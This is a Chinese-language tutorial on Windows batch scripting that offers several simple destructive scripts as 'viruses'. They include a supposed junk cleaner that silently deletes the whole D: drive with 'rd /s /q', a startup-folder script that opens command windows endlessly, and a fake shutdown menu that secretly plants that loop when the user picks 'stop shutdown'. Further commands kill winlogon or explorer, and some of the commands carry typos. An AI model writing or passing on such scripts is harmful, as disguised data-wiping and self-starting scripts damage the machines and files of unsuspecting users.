批处理与简单病毒

批处理，即windows系统下的脚本，可在cmd环境下连续执行多条DOS命令。

#垃圾清理与批处理初步

@echo off #隐藏echo，直接输出内容，为批处理一般必要语句
color 02 #设置颜色，可通过color ？显示所有颜色

echo ====
echo 你应该清理垃圾了
echo ====

pause #批处理中特有用法，暂停键

echo. #批处理特有用法，生成一行空行
echo laji is cleaning...
d: #进入d盘
cd \ #确认在d盘根目录下
rd./s/q >nul 2>nul 
#1>nul 2>nul 将执行结果添加到一个空文件里，即不显示执行结果
#不经提示删除文件，且不提示成功或者失败
ping -n 10 127.0.0.1 >nul 2>nul
# ping自己10个包，且不提示
echo ok!
pause

一个简单的病毒

:d
copy over.bat "%userprofile%\「开始」菜单\程序\启动"
#：d添加标签，“userprofile”是一个系统变量，指向当前用户的家目录
start 
# 可以打开程序或者网页，不添加参数则开启cmd
goto d
# 无限打开cmd

一个看似正常实则不正常的程序

@echo off
title over
color 80

:menu 
echo ===========
cls #清空屏幕，使桌面上看起来只有一个一个菜单
echo menu
echo 1. shutdown
echo 2. stop shutdown
echo 3. exit
echo ===========

set /p num=which one:
#set 设置变量，/p表示num的值由客户输入
if "%num%"=="1" goto 1
#注意要提取并比较变量值时，用%%提取变量值，用“”转换为字符串进行比较
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3
echo f**k
#如果客户不输入1.2.3，骂他（狗头），并且跳回主菜单让他重新输入
pause
#让客户看到，我们在骂他
goto menu

:1
set /p time=how long
shutdown /s /f /t %time%
goto menu

:2
shutdown /a
#下面要悄悄写入一个病毒
echo :a >> "%userprofile%\「开始」菜单\程序\启动\over.bat"
# 创建over.bat写入标签a
echo start >> "%userprofile%\「开始」菜单\程序\启动\over.bat"
# 为标签a写入start
echo goto a >> "%userprofile%\「开始」菜单\程序\启动\over.bat"
# 为标签a追加goto a，完成套娃
goto menu

:3
exit
goto menu

两条额外的·dos命令
1.ntsd -c -p -pn winlogon.exe
win2003蓝屏命令，强行终止客户程序，但客户程序已在运行，故over
2.tsakkill /im explorer.exe /f强行终止桌面，
/im 表示通过镜像名强行终止，故不需要输入具体位置
/im 后面需接文件名，/f应该加在/im前面或文件名后面，不可加在/im后面
可通过start c:\windows\explorer.exew打开